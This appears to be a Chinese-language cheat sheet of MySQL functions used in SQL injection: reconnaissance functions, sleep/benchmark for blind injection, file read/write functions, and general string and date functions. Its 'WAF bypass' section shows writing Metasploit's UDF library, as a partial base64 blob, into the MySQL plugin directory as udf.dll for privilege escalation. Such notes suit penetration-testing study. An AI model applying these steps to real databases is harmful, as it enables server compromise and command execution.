注入常用函数
数据库相关
- database() --- 返回当前数据库名
- @@datadir --- 读取数据库路径
- @@basedir --- 读取数据库安全路径
- @@version_compile_os --- 返回当前操作系统
UDF相关
- version() || @@version --- 返回MySQL服务器的版本
- show variables like "%plugin%"; --- 查看mysql插件路径
- show variables like '%version_%'; --- 查看系统版本、位数
用户相关
- User() || System_user() --- 用户名
- Current_Uere() --- 当前登陆用户名
- Session_User() --- 连接数据库的用户名
- Connection_id() --- 返回当前客户的连接ID
hash
- md5()
- password() --- 登录密码用这个函数加密后存入表中
other
- Found_Rows() --- 返回最后一个SELECT查询进行检索的总行数
- Benchmark(count,expr) --- 将表达式expr重复运行count次
- sleep()
File读写类函数
MySQL读写系统文件需要一些特定的设置,具体内容在:https://www.cnblogs.com/mysticbinary/articles/11346191.html
- into dumpfile()
- into outfile()
- load_file()
- system cat /test.php
- system vim /test.php
字符串类函数
注入常用
- length() 返回字符串的字节数
- char_length() 返回的才是字符数
- locate(sub_str,string)
- position(sub_str in string)
- instr(str,sub_str)
Base64加解密(绕过WAF)
- to_base64()
绕过waf example:
select to_base64(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll'))
into dumpfile '/tmp/udf.b64';
- from_base64()
绕过waf example:
select from_base64("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAzwu3gd6ODs3ejg7N3o4OzafEQs3Wjg7Np8QCzfaODs2nxB7N1o4OzUGX4
s3Sjg7N3o4KzW6ODs2nxCrN2o4OzafEWs3Wjg7Np8RGzdqODs2nxErN2o4OzUmljaHejg7MAAAAA
AAAAAAAAAAAAAAAAUEUAAGSGBgBwsYNLAAAAAAAAAADwACIgCwIJAAASAAAAFgAAAAAAADQaAAAA
EAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAgAAAAAQAADPOAAACAEABAAAQAAAA
AAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAA5AAAFAgAAQDQAADwAAAAAYAAAsAIA
AABQAABoAQAAAAAAAAAAAAAAcAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAwAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAR
EAAAABAAAAASAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAABQsAAAAwAAAADAAAABYAAAAA")
into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
判断字符串所在位置
- find_in_set(sub_string,str_set)
- field(s,str1,str2,...,strN)
- elt(n,str1,str2,...,strN)
合并
- concat()
- concat_ws()
长度
- lower(string)
- upper(string)
- left(string,x)
- right(string,x)
填充
- lpad()
- rpad()
消除空格
- ltrim(string) --- 删除行首空格
- rtrim(string) --- 删除行尾空格
- trim(string) --- 删除行首和行尾空格
- trim(substring from string) --- 删除行首和行尾的字符串substring
其他
- repeat(string,x)
- replace(string,a,b)
- insert(string,p1,len,instead_string)
- substring(string,x,y)
- strcmp()
- reverse()
数学类函数
to-do
日期时间类函数
返回当前日期
-
curdate()
-
current_date()
-
curtime()
-
current_time()
-
now()
-
current_timestamp()
-
localtime()
-
localtimestamp
-
localtimestamp()
-
sysdate()
流程控制条件判断类函数
-
if()
-
ifnull() --- 如果value1不为空则返回value1,否则返回value2。总之就是给定一个非null值。允许value2为null。
-
nullif() --- 如果expr1等于expr2,则返回null,否则返回expr1。也就是说,两者不相等时取前者,否则取NULL。如果expr1和expr2任意一个为null,则直接返回null。
-
case语句
reference:https://www.cnblogs.com/zybcn/p/8931297.html
select t.name,t.sex, case when t.sex = '0' then 'man'
when t.sex='1' then 'women' else 'other' end from test_tb as t;
类型转换类函数
- cast()
- convert()